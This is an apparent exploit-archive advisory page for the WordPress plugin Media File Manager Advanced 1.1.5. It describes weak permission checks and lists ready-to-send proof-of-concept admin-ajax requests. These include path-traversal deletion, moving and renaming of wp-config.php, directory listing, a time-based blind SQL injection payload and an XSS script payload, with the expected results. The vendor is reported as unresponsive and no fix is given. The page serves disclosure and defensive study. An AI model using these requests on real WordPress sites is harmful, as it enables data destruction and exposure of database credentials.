WordPress Media File Manager Advanced 1.1.5 XSS / SQL Injection

WordPress Media File Manager Advanced 1.1.5 XSS / SQL Injection: Posted May 14, 2015; Authored by Evex; WordPress Media File Manager Advanced plugin versions 1.1.5 and below suffer from cross site scripting, various modification, and remote SQL injection vulnerabilities.; tags | exploit, remote, vulnerability, xss, sql injection; SHA-256 | 4166675e925816acdce6d734916fadfe5a205ce3a81f8404d06202ad9247bc71; Download | Favorite | View

WordPress Media File Manager Advanced 1.1.5 XSS / SQL Injection

Description

"media-file-manager-advanced" suffers from executing administrator actions
by any authenticated user due to weak permissions checking.
an attacker can delete/update posts, Creating/Removing/Listing Directories,
Moving/Renaming/Deleting Files, Blind SQL Injection and Cross-Site
Scripting.

Homepage

https://wordpress.org/plugins/media-file-manager-advanced/

Affected Version

<= 1.1.5

Description

Vulnerability Scope


LFD,SQL,XSS,Site Ruining and Changing of Content.

Authorization Required

User

Proof of Concept


Post Delete
https://domain.tld/wp-admin/admin-ajax.php?action=mfma_relocator_delete
post: id=17

MKDIR
https://domain.tld/wp-admin/admin-ajax.php?action=mfma_relocator_mkdir
newdir=EVEXFOLDER

folder exists: https://domain.tld/wp-contents/uploads/EVEXFOLDER

RMDIR (Dir Must Be Empty)
https://domain.tld/wp-admin/admin-ajax.php?action=mfma_relocator_delete_empty_dir
dir=EVEXFOLDER&name=

not found: https://domain.tld/wp-contents/uploads/EVEXFOLDER

UNLINK
https://domain.tld/wp-admin/admin-ajax.php?action=mfma_relocator_delete
dir=../../&name=wp-config.php

no more wp-config.php

Blind SQL INJECTION
https://domain.tld/wp-admin/admin-ajax.php?action=mfma_relocator_get_image_insert_screen
id=1 AND (SELECT * FROM (SELECT(SLEEP(10)))LCKZ)

Sleeps for 10 seconds

XSS
https://domain.tld/wp-admin/admin-ajax.php?action=mfma_relocator_get_image_insert_screen
id="</button><script>alert(1)</script>

Alerts(1)

Update Post
https://domain.tld/wp-admin/admin-ajax.php?action=mfma_relocator_update_media_information
id=34&title=New_Title&caption=bla&description=Dummy Description

Move Files
https://domain.tld/wp-admin/admin-ajax.php?action=mfma_relocator_move
dir_from=../../&items=wp-config.php&dir_to=

now wp-config.php is in /wp-content/uploads/wp-config.php


Renaming Files
https://domain.tld/wp-admin/admin-ajax.php?action=mfma_relocator_rename
dir=../../&from=wp-config.php&to=wp-config.txt

now wp-config.php is renamed to wp-config.txt

Directory Listing
https://domain.tld/wp-admin/admin-ajax.php?action=mfma_relocator_getdir
dir=../../

will list all files and directories

Fix

No Fix Available at The Moment.

Time line

Notified Vendor - No Reply
Publish Disclosure

Top Authors In Last 30 Days

Red Hat 300 files
Ubuntu 63 files
Debian 20 files
LiquidWorm 19 files
Apple 9 files
Gentoo 5 files
Google Security Research 4 files
Alter Prime 3 files
Chokri Hammedi 3 files
nu11secur1ty 2 files

File Archives

Systems

AIX (430)
Apple (2,126)
BSD (378)
CentOS (61)
Cisco (1,954)
Debian (7,163)
Fedora (1,693)
FreeBSD (1,247)
Gentoo (4,604)
HPUX (881)
iOS (393)
iPhone (108)
IRIX (220)
Juniper (71)
Linux (51,928)
Mac OS X (696)
Mandriva (3,105)
NetBSD (256)
OpenBSD (490)
RedHat (17,326)
Slackware (941)
Solaris (1,615)
SUSE (1,444)
Ubuntu (9,981)
UNIX (9,474)
UnixWare (188)
Windows (6,784)
Other

WordPress Media File Manager Advanced 1.1.5 XSS / SQL Injection

WordPress Media File Manager Advanced 1.1.5 XSS / SQL Injection

File Archive:

November 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

WordPress Media File Manager Advanced 1.1.5 XSS / SQL Injection

Share This

WordPress Media File Manager Advanced 1.1.5 XSS / SQL Injection

File Archive:

November 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems